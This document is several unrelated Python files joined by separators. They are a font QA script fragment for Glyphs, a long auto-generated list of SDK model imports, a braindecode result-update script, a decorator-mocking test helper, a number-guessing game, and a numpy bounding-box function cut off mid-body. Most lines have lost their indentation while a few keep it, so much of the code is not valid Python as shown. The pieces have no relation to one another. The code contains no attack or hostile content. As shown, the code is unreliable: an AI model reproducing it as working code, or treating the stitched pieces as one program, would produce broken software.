# Check
self.w.button = vanilla.Button((14, self.leading+40, 300, 20), "Check", callback=self.buttonCallback)
# Resize window to fit all tests
self.w.setPosSize((100.0, 100.0, 350.0, self.leading + 75))
self.w.open()
def _heading(self, title):
self.leading += 20
setattr(self.w, 'text%s' % self.head_count, vanilla.TextBox((14, self.leading, 300, 14), title, sizeStyle='small'))
self.leading += 12
self.head_count += 1
setattr(self.w, 'rule%s' % self.head_count, vanilla.HorizontalLine((14, self.leading, 300, 14)))
self.leading += 12
def _checkbox(self, attr, title, value=True):
setattr(self.w, attr, vanilla.CheckBox((14, self.leading, 300, 20), title, value=value))
self.leading += 20
def buttonCallback(self, sender):
main(**self.w.__dict__)
def check_field(key, yml, font, fix=False):
'''Check if a font's attribute matches the yml document'''
if 'any' in str(yml):
print 'PASS: font %s has attribute\n' % key
elif yml != font:
print 'ERROR: font %s is not equal to yml %s\n' % (key, key)
else:
print 'PASS: font %s is equal to yml %s\n' % (key, key)
    if fix:
        # Note: this only rebinds the local name; the font object itself is not
        # modified here.
        font = yml
def font_field(font, key):
'''Check font has key'''
if hasattr(font, key):
return getattr(font, key)
if key in font.customParameters:
return font.customParameters[key]
return None
def main_glyphs():
qa_spec = yaml.safe_load(open(script_path + '/QA/qa.yml', 'r'))
ui = GlyphsUI(qa_spec)
def main(**kwargs):
font = Glyphs.font
qa_spec = yaml.safe_load(open(script_path + '/QA/qa.yml', 'r'))
if 'glyph_no_dups' in kwargs and kwargs['glyph_no_dups'].get() == 1:
find_duplicate_glyphs.find([g.name for g in font.glyphs])
if 'check_family_name' in kwargs and kwargs['check_family_name'].get() == 1:
font_name.check_family_name(font.familyName)
print '***Check Meta Data***'
for key in qa_spec:
font_attrib = font_field(font, key)
if font_attrib:
check_field(key, qa_spec[key], font_attrib)
else:
print ('ERROR YML DOC: Attribute %s does not exist for font\n' % key)
if 'glyphs_missing_conts_or_comps' in kwargs and kwargs['glyphs_missing_conts_or_comps'].get() == 1:
has_outlines.check(font)
if 'glyph_nbspace_space' in kwargs and kwargs['glyph_nbspace_space'].get() == 1:
uni00a0_width.check(font, font.masters)
if __name__ == '__main__':
main_glyphs()
|
from __future__ import absolute_import
# import models into model package
from .ads_provider_controllers import AdsProviderControllers
from .ads_provider_controllers_controller import AdsProviderControllersController
from .ads_provider_domains import AdsProviderDomains
from .ads_provider_domains_domain import AdsProviderDomainsDomain
from .ads_provider_search import AdsProviderSearch
from .ads_provider_search_object import AdsProviderSearchObject
from .audit_settings import AuditSettings
from .audit_settings_settings import AuditSettingsSettings
from .audit_topic import AuditTopic
from .audit_topic_create_params import AuditTopicCreateParams
from .audit_topic_extended import AuditTopicExtended
from .audit_topics import AuditTopics
from .audit_topics_extended import AuditTopicsExtended
from .auth_access import AuthAccess
from .auth_access_access_item import AuthAccessAccessItem
from .auth_access_access_item_file import AuthAccessAccessItemFile
from .auth_access_access_item_permissions import AuthAccessAccessItemPermissions
from .auth_access_access_item_relevant_ace import AuthAccessAccessItemRelevantAce
from .auth_access_access_item_user import AuthAccessAccessItemUser
from .auth_group import AuthGroup
from .auth_group_create_params import AuthGroupCreateParams
from .auth_group_extended import AuthGroupExtended
from .auth_groups import AuthGroups
from .auth_groups_extended import AuthGroupsExtended
from .auth_id import AuthId
from .auth_id_ntoken import AuthIdNtoken
from .auth_id_ntoken_privilege_item import AuthIdNtokenPrivilegeItem
from .auth_netgroup import AuthNetgroup
from .auth_netgroups import AuthNetgroups
from .auth_privilege import AuthPrivilege
from .auth_privileges import AuthPrivileges
from .auth_role import AuthRole
from .auth_role_create_params import AuthRoleCreateParams
from .auth_role_extended import AuthRoleExtended
from .auth_roles import AuthRoles
from .auth_roles_extended import AuthRolesExtended
from .auth_shells import AuthShells
from .auth_user import AuthUser
from .auth_user_create_params import AuthUserCreateParams
from .auth_user_extended import AuthUserExtended
from .auth_users import AuthUsers
from .auth_users_extended import AuthUsersExtended
from .auth_wellknowns import AuthWellknowns
from .changelist_lins import ChangelistLins
from .changelist_lins_ctime import ChangelistLinsCtime
from .changelist_lins_extended import ChangelistLinsExtended
from .cloud_account import CloudAccount
from .cloud_account_create_params import CloudAccountCreateParams
from .cloud_account_extended import CloudAccountExtended
from .cloud_accounts import CloudAccounts
from .cloud_accounts_extended import CloudAccountsExtended
from .cloud_job import CloudJob
from .cloud_job_create_params import CloudJobCreateParams
from .cloud_job_extended import CloudJobExtended
from .cloud_job_files import CloudJobFiles
from .cloud_job_files_name import CloudJobFilesName
from .cloud_job_job_engine_job import CloudJobJobEngineJob
from .cloud_jobs import CloudJobs
from .cloud_jobs_extended import CloudJobsExtended
from .cloud_jobs_files import CloudJobsFiles
from .cloud_pool import CloudPool
from .cloud_pool_create_params import CloudPoolCreateParams
from .cloud_pool_extended import CloudPoolExtended
from .cloud_pools import CloudPools
from .cloud_pools_extended import CloudPoolsExtended
from .cloud_settings import CloudSettings
from .cloud_settings_settings import CloudSettingsSettings
from .cloud_settings_settings_sleep_timeout_archive import CloudSettingsSettingsSleepTimeoutArchive
from .cluster_config import ClusterConfig
from .cluster_config_device import ClusterConfigDevice
from .cluster_config_onefs_version import ClusterConfigOnefsVersion
from .cluster_config_timezone import ClusterConfigTimezone
from .cluster_identity import ClusterIdentity
from .cluster_identity_logon import ClusterIdentityLogon
from .cluster_statfs import ClusterStatfs
from .cluster_time import ClusterTime
from .compatibilities_class_active import CompatibilitiesClassActive
from .compatibilities_class_active_active_item import CompatibilitiesClassActiveActiveItem
from .compatibilities_class_active_extended import CompatibilitiesClassActiveExtended
from .compatibilities_class_active_item import CompatibilitiesClassActiveItem
from .compatibilities_class_available import CompatibilitiesClassAvailable
from .compatibilities_class_available_available_item import CompatibilitiesClassAvailableAvailableItem
from .compatibilities_ssd_active import CompatibilitiesSsdActive
from .compatibilities_ssd_active_active_item import CompatibilitiesSsdActiveActiveItem
from .compatibilities_ssd_active_extended import CompatibilitiesSsdActiveExtended
from .compatibilities_ssd_active_item import CompatibilitiesSsdActiveItem
from .compatibilities_ssd_available import CompatibilitiesSsdAvailable
from .compatibilities_ssd_available_available_item import CompatibilitiesSsdAvailableAvailableItem
from .create_cloud_account_response import CreateCloudAccountResponse
from .create_cloud_job_response import CreateCloudJobResponse
from .create_cloud_pool_response import CreateCloudPoolResponse
from .create_compatibilities_class_active_item_response import CreateCompatibilitiesClassActiveItemResponse
from .create_compatibilities_class_active_item_response_merge import CreateCompatibilitiesClassActiveItemResponseMerge
from .create_compatibilities_class_active_item_response_split import CreateCompatibilitiesClassActiveItemResponseSplit
from .create_filepool_policy_response import CreateFilepoolPolicyResponse
from .create_job_job_response import CreateJobJobResponse
from .create_nfs_aliase_response import CreateNfsAliaseResponse
from .create_quota_report_response import CreateQuotaReportResponse
from .create_response import CreateResponse
from .create_snapshot_aliase_response import CreateSnapshotAliaseResponse
from .create_snapshot_lock_response import CreateSnapshotLockResponse
from .create_snapshot_schedule_response import CreateSnapshotScheduleResponse
from .create_storagepool_nodepool_response import CreateStoragepoolNodepoolResponse
from .create_sync_reports_rotate_item_response import CreateSyncReportsRotateItemResponse
from .debug_stats import DebugStats
from .debug_stats_handler import DebugStatsHandler
from .debug_stats_unknown import DebugStatsUnknown
from .dedupe_dedupe_summary import DedupeDedupeSummary
from .dedupe_dedupe_summary_summary import DedupeDedupeSummarySummary
from .dedupe_report import DedupeReport
from .dedupe_report_extended import DedupeReportExtended
from .dedupe_reports import DedupeReports
from .dedupe_reports_extended import DedupeReportsExtended
from .dedupe_settings import DedupeSettings
from .dedupe_settings_extended import DedupeSettingsExtended
from .dedupe_settings_settings import DedupeSettingsSettings
from .empty import Empty
from .error import Error
from .event_event import EventEvent
from .event_events import EventEvents
from .event_events_extended import EventEventsExtended
from .filepool_default_policy import FilepoolDefaultPolicy
from .filepool_default_policy_action import FilepoolDefaultPolicyAction
from .filepool_default_policy_default_policy import FilepoolDefaultPolicyDefaultPolicy
from .filepool_default_policy_default_policy_action import FilepoolDefaultPolicyDefaultPolicyAction
from .filepool_default_policy_extended import FilepoolDefaultPolicyExtended
from .filepool_policies import FilepoolPolicies
from .filepool_policy import FilepoolPolicy
from .filepool_policy_action import FilepoolPolicyAction
from .filepool_policy_action_create_params import FilepoolPolicyActionCreateParams
from .filepool_policy_create_params import FilepoolPolicyCreateParams
from .filepool_policy_extended import FilepoolPolicyExtended
from .filepool_policy_file_matching_pattern import FilepoolPolicyFileMatchingPattern
from .filepool_policy_file_matching_pattern_or_criteria_item import FilepoolPolicyFileMatchingPatternOrCriteriaItem
from .filepool_policy_file_matching_pattern_or_criteria_item_and_criteria_item import FilepoolPolicyFileMatchingPatternOrCriteriaItemAndCriteriaItem
from .filepool_templates import FilepoolTemplates
from .fsa_result import FsaResult
from .fsa_result_extended import FsaResultExtended
from .fsa_results import FsaResults
from .fsa_results_extended import FsaResultsExtended
from .fsa_settings import FsaSettings
from .fsa_settings_settings import FsaSettingsSettings
from .group_member import GroupMember
from .group_members import GroupMembers
from .hdfs_proxyuser import HdfsProxyuser
from .hdfs_proxyuser_create_params import HdfsProxyuserCreateParams
from .hdfs_proxyusers import HdfsProxyusers
from .hdfs_rack import HdfsRack
from .hdfs_rack_create_params import HdfsRackCreateParams
from .hdfs_rack_extended import HdfsRackExtended
from .hdfs_racks import HdfsRacks
from .hdfs_racks_extended import HdfsRacksExtended
from .hdfs_settings import HdfsSettings
from .hdfs_settings_settings import HdfsSettingsSettings
from .history_file import HistoryFile
from .history_file_statistic import HistoryFileStatistic
from .job_event import JobEvent
from .job_events import JobEvents
from .job_job import JobJob
from .job_job_changelistcreate_params import JobJobChangelistcreateParams
from .job_job_create_params import JobJobCreateParams
from .job_job_domainmark_params import JobJobDomainmarkParams
from .job_job_extended import JobJobExtended
from .job_job_prepair_params import JobJobPrepairParams
from .job_job_snaprevert_params import JobJobSnaprevertParams
from .job_job_summary import JobJobSummary
from .job_job_summary_summary import JobJobSummarySummary
from .job_jobs import JobJobs
from .job_jobs_extended import JobJobsExtended
from .job_policies import JobPolicies
from .job_policies_extended import JobPoliciesExtended
from .job_policies_type import JobPoliciesType
from .job_policy import JobPolicy
from .job_policy_create_params import JobPolicyCreateParams
from .job_policy_interval import JobPolicyInterval
from .job_report import JobReport
from .job_reports import JobReports
from .job_statistics import JobStatistics
from .job_statistics_job import JobStatisticsJob
from .job_statistics_job_node import JobStatisticsJobNode
from .job_statistics_job_node_cpu import JobStatisticsJobNodeCpu
from .job_statistics_job_node_io import JobStatisticsJobNodeIo
from .job_statistics_job_node_io_read import JobStatisticsJobNodeIoRead
from .job_statistics_job_node_io_write import JobStatisticsJobNodeIoWrite
from .job_statistics_job_node_memory import JobStatisticsJobNodeMemory
from .job_statistics_job_node_memory_physical import JobStatisticsJobNodeMemoryPhysical
from .job_statistics_job_node_memory_virtual import JobStatisticsJobNodeMemoryVirtual
from .job_statistics_job_node_worker import JobStatisticsJobNodeWorker
from .job_type import JobType
from .job_type_extended import JobTypeExtended
from .job_types import JobTypes
from .job_types_extended import JobTypesExtended
from .license_license import LicenseLicense
from .license_license_create_params import LicenseLicenseCreateParams
from .license_licenses import LicenseLicenses
from .mapping_identities import MappingIdentities
from .mapping_identity import MappingIdentity
from .mapping_identity_create_params import MappingIdentityCreateParams
from .mapping_identity_target import MappingIdentityTarget
from .mapping_identity_target_create_params import MappingIdentityTargetCreateParams
from .mapping_users_lookup import MappingUsersLookup
from .mapping_users_lookup_mapping_item import MappingUsersLookupMappingItem
from .mapping_users_lookup_mapping_item_group import MappingUsersLookupMappingItemGroup
from .mapping_users_lookup_mapping_item_user import MappingUsersLookupMappingItemUser
from .mapping_users_rules import MappingUsersRules
from .mapping_users_rules_extended import MappingUsersRulesExtended
from .mapping_users_rules_parameters import MappingUsersRulesParameters
from .mapping_users_rules_rule import MappingUsersRulesRule
from .mapping_users_rules_rule_extended import MappingUsersRulesRuleExtended
from .mapping_users_rules_rule_options import MappingUsersRulesRuleOptions
from .mapping_users_rules_rule_options_default_user import MappingUsersRulesRuleOptionsDefaultUser
from .mapping_users_rules_rule_options_extended import MappingUsersRulesRuleOptionsExtended
from .mapping_users_rules_rule_user2 import MappingUsersRulesRuleUser2
from .mapping_users_rules_rule_user2_extended import MappingUsersRulesRuleUser2Extended
from .mapping_users_rules_rules import MappingUsersRulesRules
from .mapping_users_rules_rules_parameters import MappingUsersRulesRulesParameters
from .nfs_aliase import NfsAliase
from .nfs_aliase_create_params import NfsAliaseCreateParams
from .nfs_aliase_extended import NfsAliaseExtended
from .nfs_aliases import NfsAliases
from .nfs_aliases_extended import NfsAliasesExtended
from .nfs_check import NfsCheck
from .nfs_check_extended import NfsCheckExtended
from .nfs_export import NfsExport
from .nfs_export_create_params import NfsExportCreateParams
from .nfs_export_extended import NfsExportExtended
from .nfs_export_map_all import NfsExportMapAll
from .nfs_export_map_all_secondary_groups import NfsExportMapAllSecondaryGroups
from .nfs_exports import NfsExports
from .nfs_exports_extended import NfsExportsExtended
from .nfs_exports_summary import NfsExportsSummary
from .nfs_exports_summary_summary import NfsExportsSummarySummary
from .nfs_nlm_locks import NfsNlmLocks
from .nfs_nlm_locks_lock import NfsNlmLocksLock
from .nfs_nlm_sessions import NfsNlmSessions
from .nfs_nlm_sessions_session import NfsNlmSessionsSession
from .nfs_nlm_waiters import NfsNlmWaiters
from .nfs_settings_export import NfsSettingsExport
from .nfs_settings_export_settings import NfsSettingsExportSettings
from .nfs_settings_global import NfsSettingsGlobal
from .nfs_settings_global_settings import NfsSettingsGlobalSettings
from .nfs_settings_zone import NfsSettingsZone
from .nfs_settings_zone_settings import NfsSettingsZoneSettings
from .providers_ads import ProvidersAds
from .providers_ads_ads_item import ProvidersAdsAdsItem
from .providers_ads_id_params import ProvidersAdsIdParams
from .providers_ads_item import ProvidersAdsItem
from .providers_file import ProvidersFile
from .providers_file_file_item import ProvidersFileFileItem
from .providers_file_id_params import ProvidersFileIdParams
from .providers_file_item import ProvidersFileItem
from .providers_krb5 import ProvidersKrb5
from .providers_krb5_extended import ProvidersKrb5Extended
from .providers_krb5_id_params import ProvidersKrb5IdParams
from .providers_krb5_id_params_keytab_entry import ProvidersKrb5IdParamsKeytabEntry
from .providers_krb5_item import ProvidersKrb5Item
from .providers_krb5_krb5_item import ProvidersKrb5Krb5Item
from .providers_krb5_krb5_item_extended import ProvidersKrb5Krb5ItemExtended
from .providers_ldap import ProvidersLdap
from .providers_ldap_id_params import ProvidersLdapIdParams
from .providers_ldap_item import ProvidersLdapItem
from .providers_ldap_ldap_item import ProvidersLdapLdapItem
from .providers_local import ProvidersLocal
from .providers_local_id_params import ProvidersLocalIdParams
from .providers_local_local_item import ProvidersLocalLocalItem
from .providers_nis import ProvidersNis
from .providers_nis_id_params import ProvidersNisIdParams
from .providers_nis_item import ProvidersNisItem
from .providers_nis_nis_item import ProvidersNisNisItem
from .providers_summary import ProvidersSummary
from .providers_summary_provider_instance import ProvidersSummaryProviderInstance
from .providers_summary_provider_instance_connection import ProvidersSummaryProviderInstanceConnection
from .quota_notification import QuotaNotification
from .quota_notification_create_params import QuotaNotificationCreateParams
from .quota_notification_extended import QuotaNotificationExtended
from .quota_notifications import QuotaNotifications
from .quota_notifications_extended import QuotaNotificationsExtended
from .quota_quota import QuotaQuota
from .quota_quota_create_params import QuotaQuotaCreateParams
from .quota_quota_extended import QuotaQuotaExtended
from .quota_quota_thresholds import QuotaQuotaThresholds
from .quota_quota_thresholds_extended import QuotaQuotaThresholdsExtended
from .quota_quota_usage import QuotaQuotaUsage
from .quota_quotas import QuotaQuotas
from .quota_quotas_extended import QuotaQuotasExtended
from .quota_quotas_summary import QuotaQuotasSummary
from .quota_quotas_summary_summary import QuotaQuotasSummarySummary
from .quota_reports import QuotaReports
from .remotesupport_connectemc import RemotesupportConnectemc
from .remotesupport_connectemc_connectemc import RemotesupportConnectemcConnectemc
from .report_about import ReportAbout
from .report_about_report import ReportAboutReport
from .report_subreport import ReportSubreport
from .report_subreports import ReportSubreports
from .report_subreports_extended import ReportSubreportsExtended
from .reports_report_subreports import ReportsReportSubreports
from .reports_report_subreports_extended import ReportsReportSubreportsExtended
from .reports_report_subreports_subreport import ReportsReportSubreportsSubreport
from .role_privileges import RolePrivileges
from .settings_access_time import SettingsAccessTime
from .settings_access_time_access_time_item import SettingsAccessTimeAccessTimeItem
from .settings_access_time_extended import SettingsAccessTimeExtended
from .settings_global import SettingsGlobal
from .settings_global_global_settings import SettingsGlobalGlobalSettings
from .settings_krb5_defaults import SettingsKrb5Defaults
from .settings_krb5_defaults_krb5_settings import SettingsKrb5DefaultsKrb5Settings
from .settings_krb5_domain import SettingsKrb5Domain
from .settings_krb5_domain_create_params import SettingsKrb5DomainCreateParams
from .settings_krb5_domains import SettingsKrb5Domains
from .settings_krb5_domains_domain import SettingsKrb5DomainsDomain
from .settings_krb5_domains_extended import SettingsKrb5DomainsExtended
from .settings_krb5_realm import SettingsKrb5Realm
from .settings_krb5_realm_create_params import SettingsKrb5RealmCreateParams
from .settings_mapping import SettingsMapping
from .settings_mapping_extended import SettingsMappingExtended
from .settings_mapping_extended_extended import SettingsMappingExtendedExtended
from .settings_mapping_mapping_settings import SettingsMappingMappingSettings
from .settings_mappings import SettingsMappings
from .settings_reports import SettingsReports
from .settings_reports_extended import SettingsReportsExtended
from .settings_reports_settings import SettingsReportsSettings
from .smb_openfile import SmbOpenfile
from .smb_openfiles import SmbOpenfiles
from .smb_session import SmbSession
from .smb_sessions import SmbSessions
from .smb_settings_global import SmbSettingsGlobal
from .smb_settings_global_settings import SmbSettingsGlobalSettings
from .smb_settings_global_settings_audit_global_sacl_item import SmbSettingsGlobalSettingsAuditGlobalSaclItem
from .smb_settings_share import SmbSettingsShare
from .smb_settings_share_settings import SmbSettingsShareSettings
from .smb_share import SmbShare
from .smb_share_create_params import SmbShareCreateParams
from .smb_share_extended import SmbShareExtended
from .smb_share_permission import SmbSharePermission
from .smb_shares import SmbShares
from .smb_shares_extended import SmbSharesExtended
from .smb_shares_summary import SmbSharesSummary
from .smb_shares_summary_summary import SmbSharesSummarySummary
from .snapshot_aliase import SnapshotAliase
from .snapshot_aliase_create_params import SnapshotAliaseCreateParams
from .snapshot_aliase_extended import SnapshotAliaseExtended
from .snapshot_aliases import SnapshotAliases
from .snapshot_aliases_extended import SnapshotAliasesExtended
from .snapshot_changelists import SnapshotChangelists
from .snapshot_changelists_extended import SnapshotChangelistsExtended
from .snapshot_lock import SnapshotLock
from .snapshot_lock_create_params import SnapshotLockCreateParams
from .snapshot_lock_extended import SnapshotLockExtended
from .snapshot_locks import SnapshotLocks
from .snapshot_locks_extended import SnapshotLocksExtended
from .snapshot_pending import SnapshotPending
from .snapshot_pending_pending_item import SnapshotPendingPendingItem
from .snapshot_repstates import SnapshotRepstates
from .snapshot_repstates_extended import SnapshotRepstatesExtended
from .snapshot_schedule import SnapshotSchedule
from .snapshot_schedule_create_params import SnapshotScheduleCreateParams
from .snapshot_schedule_extended import SnapshotScheduleExtended
from .snapshot_schedule_extended_extended import SnapshotScheduleExtendedExtended
from .snapshot_schedules import SnapshotSchedules
from .snapshot_schedules_extended import SnapshotSchedulesExtended
from .snapshot_settings import SnapshotSettings
from .snapshot_settings_extended import SnapshotSettingsExtended
from .snapshot_settings_settings import SnapshotSettingsSettings
from .snapshot_snapshot import SnapshotSnapshot
from .snapshot_snapshot_create_params import SnapshotSnapshotCreateParams
from .snapshot_snapshot_extended import SnapshotSnapshotExtended
from .snapshot_snapshots import SnapshotSnapshots
from .snapshot_snapshots_extended import SnapshotSnapshotsExtended
from .snapshot_snapshots_summary import SnapshotSnapshotsSummary
from .snapshot_snapshots_summary_summary import SnapshotSnapshotsSummarySummary
from .statistics_current import StatisticsCurrent
from .statistics_current_stat import StatisticsCurrentStat
from .statistics_history import StatisticsHistory
from .statistics_history_stat import StatisticsHistoryStat
from .statistics_history_stat_value import StatisticsHistoryStatValue
from .statistics_key import StatisticsKey
from .statistics_key_policy import StatisticsKeyPolicy
from .statistics_keys import StatisticsKeys
from .statistics_keys_extended import StatisticsKeysExtended
from .statistics_protocol import StatisticsProtocol
from .statistics_protocols import StatisticsProtocols
from .storagepool_nodepool import StoragepoolNodepool
from .storagepool_nodepool_create_params import StoragepoolNodepoolCreateParams
from .storagepool_nodepool_extended import StoragepoolNodepoolExtended
from .storagepool_nodepool_usage import StoragepoolNodepoolUsage
from .storagepool_nodepools import StoragepoolNodepools
from .storagepool_nodepools_extended import StoragepoolNodepoolsExtended
from .storagepool_settings import StoragepoolSettings
from .storagepool_settings_extended import StoragepoolSettingsExtended
from .storagepool_settings_settings import StoragepoolSettingsSettings
from .storagepool_settings_settings_spillover_target import StoragepoolSettingsSettingsSpilloverTarget
from .storagepool_settings_spillover_target import StoragepoolSettingsSpilloverTarget
from .storagepool_status import StoragepoolStatus
from .storagepool_status_unhealthy_item import StoragepoolStatusUnhealthyItem
from .storagepool_status_unhealthy_item_affected_item import StoragepoolStatusUnhealthyItemAffectedItem
from .storagepool_status_unhealthy_item_diskpool import StoragepoolStatusUnhealthyItemDiskpool
from .storagepool_status_unprovisioned_item import StoragepoolStatusUnprovisionedItem
from .storagepool_storagepool import StoragepoolStoragepool
from .storagepool_storagepools import StoragepoolStoragepools
from .storagepool_suggested_protection import StoragepoolSuggestedProtection
from .storagepool_suggested_protection_suggested_protection_item import StoragepoolSuggestedProtectionSuggestedProtectionItem
from .storagepool_tier import StoragepoolTier
from .storagepool_tier_create_params import StoragepoolTierCreateParams
from .storagepool_tier_extended import StoragepoolTierExtended
from .storagepool_tiers import StoragepoolTiers
from .storagepool_tiers_extended import StoragepoolTiersExtended
from .storagepool_unprovisioned import StoragepoolUnprovisioned
from .storagepool_unprovisioned_unprovisioned_item import StoragepoolUnprovisionedUnprovisionedItem
from .sync_job import SyncJob
from .sync_job_create_params import SyncJobCreateParams
from .sync_job_extended import SyncJobExtended
from .sync_job_phase import SyncJobPhase
from .sync_job_policy import SyncJobPolicy
from .sync_job_policy_file_matching_pattern import SyncJobPolicyFileMatchingPattern
from .sync_job_policy_file_matching_pattern_or_criteria_item import SyncJobPolicyFileMatchingPatternOrCriteriaItem
from .sync_job_policy_file_matching_pattern_or_criteria_item_and_criteria_item import SyncJobPolicyFileMatchingPatternOrCriteriaItemAndCriteriaItem
from .sync_job_worker import SyncJobWorker
from .sync_jobs import SyncJobs
from .sync_jobs_extended import SyncJobsExtended
from .sync_policies import SyncPolicies
from .sync_policies_extended import SyncPoliciesExtended
from .sync_policy import SyncPolicy
from .sync_policy_create_params import SyncPolicyCreateParams
from .sync_policy_extended import SyncPolicyExtended
from .sync_policy_extended_extended import SyncPolicyExtendedExtended
from .sync_policy_source_network import SyncPolicySourceNetwork
from .sync_report import SyncReport
from .sync_report_policy import SyncReportPolicy
from .sync_reports import SyncReports
from .sync_reports_extended import SyncReportsExtended
from .sync_reports_rotate import SyncReportsRotate
from .sync_rule import SyncRule
from .sync_rule_create_params import SyncRuleCreateParams
from .sync_rule_extended import SyncRuleExtended
from .sync_rule_extended_extended import SyncRuleExtendedExtended
from .sync_rule_schedule import SyncRuleSchedule
from .sync_rules import SyncRules
from .sync_rules_extended import SyncRulesExtended
from .sync_settings import SyncSettings
from .sync_settings_settings import SyncSettingsSettings
from .target_policies import TargetPolicies
from .target_policies_extended import TargetPoliciesExtended
from .target_policy import TargetPolicy
from .target_report import TargetReport
from .target_reports import TargetReports
from .target_reports_extended import TargetReportsExtended
from .user_change_password import UserChangePassword
from .user_member_of import UserMemberOf
from .worm_domain import WormDomain
from .worm_domain_create_params import WormDomainCreateParams
from .worm_domain_extended import WormDomainExtended
from .worm_domains import WormDomains
from .worm_domains_extended import WormDomainsExtended
from .worm_settings import WormSettings
from .worm_settings_extended import WormSettingsExtended
from .worm_settings_settings import WormSettingsSettings
from .zone import Zone
from .zone_create_params import ZoneCreateParams
from .zone_extended import ZoneExtended
from .zones import Zones
from .zones_summary import ZonesSummary
from .zones_summary_extended import ZonesSummaryExtended
from .zones_summary_summary import ZonesSummarySummary
from .zones_summary_summary_extended import ZonesSummarySummaryExtended
|
#!/usr/bin/env python
import numpy as np
import pickle
from glob import glob
from braindecode.experiments.load import load_model
from braindecode.experiments.experiment import create_experiment
import sys
import logging
log = logging.getLogger(__name__)
def update_result_to_new_iterator(basename):
    """Recompute the monitor channels for a saved experiment using the current
    iterator, check that loss and sample_misclass still match the stored values,
    and overwrite the stored misclass values in the .result.pkl file."""
    exp = create_experiment(basename + '.yaml')
model = load_model(basename + '.pkl')
exp.final_layer = model
exp.setup()
datasets = exp.dataset_provider.get_train_merged_valid_test(exp.dataset)
exp.create_monitors(datasets)
exp.monitor_manager.monitor_epoch(exp.monitor_chans, datasets,
exp.iterator)
result = np.load(basename + '.result.pkl')
for set_name in ['train', 'valid', 'test']:
for chan_name in 'loss', 'sample_misclass':
full_chan_name = set_name + '_' + chan_name
assert np.allclose(result.monitor_channels[full_chan_name][-1],
exp.monitor_chans[full_chan_name][-1],
rtol=1e-3, atol=1e-3), (
"Not close: old {:f}, new: {:f}".format(result.monitor_channels[full_chan_name][-1],
exp.monitor_chans[full_chan_name][-1]))
for set_name in ['train', 'valid', 'test']:
full_chan_name = set_name + '_' + 'misclass'
result.monitor_channels[full_chan_name][-1] = exp.monitor_chans[full_chan_name][-1]
result_filename = basename + '.result.pkl'
pickle.dump(result, open(result_filename, 'w'))
if __name__ == '__main__':
start = int(sys.argv[1])
stop = int(sys.argv[2])
all_result_names = sorted(glob('data/models/paper/ours/cnt/shallow/*.result.pkl'),
key=lambda s:int(s.split('.result.pkl')[0].split('/')[-1]))
for i_result, result_name in enumerate(all_result_names[start:stop]):
log.info("Running {:d} of {:d}".format(i_result, len(all_result_names[start:stop])))
basename = result_name.replace('.result.pkl', '')
update_result_to_new_iterator(basename)
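# Example invocation (a sketch; the script name below is a placeholder for this file):
#   python update_results.py 0 10   # re-check and update results 0..9 in the shallow model dir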
|
# -*- coding: utf-8 -*-
"""
Garland: for unwrapping decorators.
"""
__author__ = 'Ben Lopatin'
__email__ = 'ben@wellfire.co'
__version__ = '0.3.0'
import sys
import importlib
if sys.version_info.major == 3:
from importlib import reload # Common interface
from unittest.mock import patch
else:
from mock import patch
def mock_decorator(*a, **k):
"""
    A pass-through decorator that returns the underlying function.
This is used as the default for replacing decorators.
"""
# This is a decorator without parameters, e.g.
#
# @login_required
# def some_view(request):
# ...
#
if a:
# This could fail in the instance where a callable argument is passed
# as a parameter to the decorator!
if callable(a[0]):
def wrapper(*args, **kwargs):
return a[0](*args, **kwargs)
return wrapper
# This is a decorator with parameters, e.g.
#
# @render_template("index.html")
# def some_view(request):
# ...
#
def real_decorator(function):
def wrapper(*args, **kwargs):
return function(*args, **kwargs)
return wrapper
return real_decorator
def tinsel(to_patch, module_name, decorator=mock_decorator):
"""
Decorator for simple in-place decorator mocking for tests
Args:
to_patch: the string path of the function to patch
module_name: complete string path of the module to reload
decorator (optional): replacement decorator. By default a pass-through
will be used.
Returns:
        A wrapped test function; while it executes, the specified path is
        patched and the target module is reloaded.
"""
def fn_decorator(function):
def wrapper(*args, **kwargs):
with patch(to_patch, decorator):
m = importlib.import_module(module_name)
reload(m)
function(*args, **kwargs)
reload(m)
return wrapper
return fn_decorator
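# A minimal usage sketch (the module and decorator paths below are hypothetical,
# for illustration only): `tinsel` patches the named decorator with `mock_decorator`,
# reloads the target module so its functions are rebound without the real decorator,
# runs the test, then reloads the module again afterwards.
#
# @tinsel('myapp.decorators.login_required', 'myapp.views')
# def test_some_view():
#     from myapp import views
#     views.some_view(request=None)  # runs without the real login check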
|
## Guess Game 2.0
# The program prompts the user to think of a number from 1-100, then guesses the user's
# number using the user's feedback on whether their number is higher or lower than each guess.
import sys
def guessGame(ans, guess):
if ans[0] == "h" or ans[0] == "H":
offset = (guess[2] - guess[0]) // 2
guess[1] = guess[0]
guess[0] += offset
elif ans[0] == "l" or ans[0] == "L":
offset = (guess[0] - guess[1]) // 2
guess[2] = guess[0]
guess[0] -= offset
return guess
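# Worked example of the narrowing above (a sketch, assuming the player thought of 83):
#   guess [50, 0, 100]  -> "Higher" -> [75, 50, 100]
#   guess [75, 50, 100] -> "Higher" -> [87, 75, 100]
#   guess [87, 75, 100] -> "Lower"  -> [81, 75, 87]
#   ... and so on until the player answers "Yes".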
if __name__=="__main__":
print("----- GUESSING GAME 2.0 -----")
print("Welcome back! Gonna be guessing your number instead of you guessing mine." + '\n')
begin = str(input("Shall we begin? (Y/N): "))
if begin[0] == "y" or begin[0] == "Y":
ready = str(input('\n' + "Great! Think of a number between 1-100. Hit Enter when you've thought of one. "))
if ready == "":
correct = False
num_guesses = 0
            # List that stores the current guess, the low boundary, and the high boundary
guess = [50, 0, 100]
while not correct:
ans = str(input('\n' + "Is it " + str(guess[0]) + "? (Yes/Higher/Lower): "))
if ans[0] == "Y" or ans[0] == "y":
num_guesses +=1
print("Yay! I won after " + str(num_guesses) + " guesses.")
break
guess = guessGame(ans, guess)
num_guesses += 1
else:
print("Okay, maybe next time. Have a great day!" )
sys.exit()
|
import numpy as np
def get_bb(seg, do_count=False):
    """Bounding box of all nonzero elements of `seg` as [min_0, max_0, min_1, max_1, ...]
    over each axis, or a list of -1s if the segmentation is empty. With do_count,
    the number of nonzero elements is appended."""
    dim = len(seg.shape)
a=np.where(seg>0)
if len(a[0])==0:
return [-1]*dim*2
out=[]
for i in range(dim):
out+=[a[i].min(), a[i].max()]
if do_count:
out+=[len(a[0])]
return out
def get_bb_all2d(seg, do_count=False, uid=None):
    """Per-label bounding boxes for a 2D label image. Returns one row per positive
    label (or per id in `uid`): [id, row_min, row_max, col_min, col_max], plus a
    pixel count column when do_count is True."""
    sz = seg.shape
assert len(sz)==2
if uid is None:
uid = np.unique(seg)
